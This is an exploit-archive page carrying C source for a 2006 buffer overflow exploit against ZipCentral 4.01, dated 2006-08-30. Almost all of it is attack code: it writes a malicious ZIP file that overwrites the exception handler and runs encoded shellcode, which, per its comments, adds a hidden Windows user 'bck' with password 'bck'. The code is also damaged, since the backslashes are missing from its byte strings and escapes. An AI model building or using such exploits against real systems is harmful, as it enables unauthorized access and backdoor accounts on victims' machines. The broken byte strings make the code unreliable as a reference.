ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit
# Published : 2006-08-30
# Author : bratax
# Previous Title : PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit
# Next Title : Solaris 10 sysinfo(2) Local Kernel Memory Disclosure Exploit
/*
ZipCentral 4.01 Exploit by bratax (http://www.bratax.be/)

Soooooo many thanks to BuzzDee and c0rrupt for helping me with all the
problems I encountered :) Wouldn't have finished this without you guys!

Greetz to everyone I like... (no, that doesn't include you turb00)!

******************************

Some technical info:
- vulnerability is available here:
  http://secunia.com/secunia_research/2006-35/advisory
- using SEH to exploit this
- some code might look weird in this source.. (e.g. shellcode, offsets,...)
  this is because a lot of values are changed in memory.. so use your favorite
  debugger to see the real values and codes
- shellcode adds a windows user "bck" with password "bck" (thx metasploit)
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)

*/

#include <stdio.h>
#include <string.h>

unsigned char scode[] =
"x89x03x59x89x05x8ax9bx98x98x98x4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x50x42x30x4bx58x45x34x4ex43x4bx48x4ex57"
"x45x30x4ax47x41x30x4fx4ex4bx58x4fx34x4ax31x4bx58"
"x4fx35x42x42x41x30x4bx4ex49x54x4bx48x46x43x4bx58"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x32x46x50x45x47x45x4ex4bx38"
"x4fx35x46x52x41x30x4bx4ex48x56x4bx38x4ex50x4bx44"
"x4bx38x4fx55x4ex51x41x50x4bx4ex4bx38x4ex51x4bx58"
"x41x50x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x33"
"x42x4cx46x46x4bx58x42x54x42x53x45x58x42x4cx4ax57"
"x4ex50x4bx58x42x34x4ex50x4bx58x42x57x4ex41x4dx4a"
"x4bx38x4ax36x4ax50x4bx4ex49x30x4bx48x42x58x42x4b"
"x42x30x42x50x42x30x4bx48x4ax56x4ex33x4fx35x41x33"
"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx57"
"x42x55x4ax56x42x4fx4cx48x46x50x4fx35x4ax46x4ax49"
"x50x4fx4cx48x50x30x47x45x4fx4fx47x4ex43x56x4dx56"
"x46x46x50x42x45x46x4ax57x45x56x42x52x4fx42x43x36"
"x42x52x50x46x45x56x46x57x42x52x45x57x43x47x45x36"
"x44x47x42x42x44x46x43x56x4bx36x42x42x44x56x43x56"
"x4bx46x42x52x4fx42x41x34x46x44x46x34x42x32x48x42"
"x48x32x42x32x50x56x45x46x46x57x42x52x4ex36x4fx36"
"x43x46x41x56x4ex56x47x36x44x37x4fx46x45x37x42x37"
"x42x52x41x54x46x56x4dx36x49x36x50x36x49x56x43x37"
"x46x57x44x47x41x56x46x37x4fx56x44x47x43x57x42x52"
"x44x56x43x46x4bx46x42x32x4fx52x41x54x46x34x46x44"
"x42x30x5a";

char head[] = "x50x4Bx03x04x14x00x00x00x00x00"
			 "xB7xACxCEx34x00x00x00x00x00x00"
			 "x00x00x00x00x00x00x14x08x00";
char middle[] = "x2ex74x78x74x50x4Bx01x02x14x00"
				"x14x00x00x00x00x00xB7xACxCEx34"
				"x00x00x00x00x00x00x00x00x00x00"
				"x00x00x14x08x00x00x00x00x00x00"
				"x01x00x24x00x00x00x00x00x00";
char tail[] = "x2ex74x78x74x50x4Bx05x06x00x00"
			 "x00x00x01x00x01x00x42x08x00x00"
			 "x32x08x00x00x00";

int main(int argc,char *argv[])
{
	char overflow[657]; // is 657 bytes big enough for a filename?
	char overflow2[1407];
FILE *vuln;
if(argc == 1)
{
    printf("ZipCentral 4.01 Buffer Overflow Exploit.n");
    printf("Coded by bratax (http://www.bratax.be/).n");
    printf("Usage: %s <outputfile>n",argv[0]);
    return 0;
}
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x41,sizeof(overflow)); //fill with crap
memcpy(overflow+2, scode, 483); // our shellcode
memcpy(overflow+653, "x82x6ExECx98", 4); // jmp back to shellcode
memset(overflow2, 0x42, sizeof(overflow2)); // more crap
memcpy(overflow2+0,"x98x85x8Ex00", 4); // pop pop ret
// pop pop ret somewhere within 0x00xxxxFF.. needed because of 2 reasons
// which I'm not going to explain here right now..
// notice that 008E8598 will be changed in memory and will become 00C4E0FF
// this might be different on other machines, but will always be 00xxE0FF


if(vuln)
{
    //Write file
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
    fclose(vuln);
}
printf("File written.nOpen with ZipCentral 4.01 to exploit.n");
return 0;
}

// www.Syue.com [2006-08-30]